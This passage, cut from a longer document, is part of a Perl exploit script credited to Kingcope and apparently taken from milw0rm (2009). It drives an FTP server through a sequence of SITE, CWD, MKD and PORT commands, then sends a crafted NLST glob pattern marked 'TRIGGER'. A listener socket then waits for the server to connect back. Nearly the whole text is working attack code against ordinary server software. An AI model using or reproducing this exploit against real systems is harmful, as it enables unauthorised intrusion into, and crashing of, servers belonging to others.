$v\r\n"; +$x = <$sock>; +print $x; +print $sock "SITE $v\r\n"; +$x = <$sock>; +print $x; +print $sock "SITE $v\r\n"; +$x = <$sock>; +print $x; +print $sock "SITE $v\r\n"; +$x = <$sock>; +print $x; +print $sock "CWD w00t$port\r\n"; +$x = <$sock>; +print $x; +print $sock "MKD CCC". "$c\r\n"; +$x = <$sock>; +print $x; +print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; +$x = <$sock>; +print $x; +# TRIGGER +print $sock "NLST $c*/../C*/\r\n"; +$x = <$sock>; +print $x; +while (1) {} +} else { +my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); +die "Could not create socket: $!\n" unless $servsock; +my $new_sock = $servsock->accept(); +while(<$new_sock>) { +print $_; +} +close($servsock); +} +#Cheerio, +# +#Kingcope + +# milw0rm.com [2009-09-01]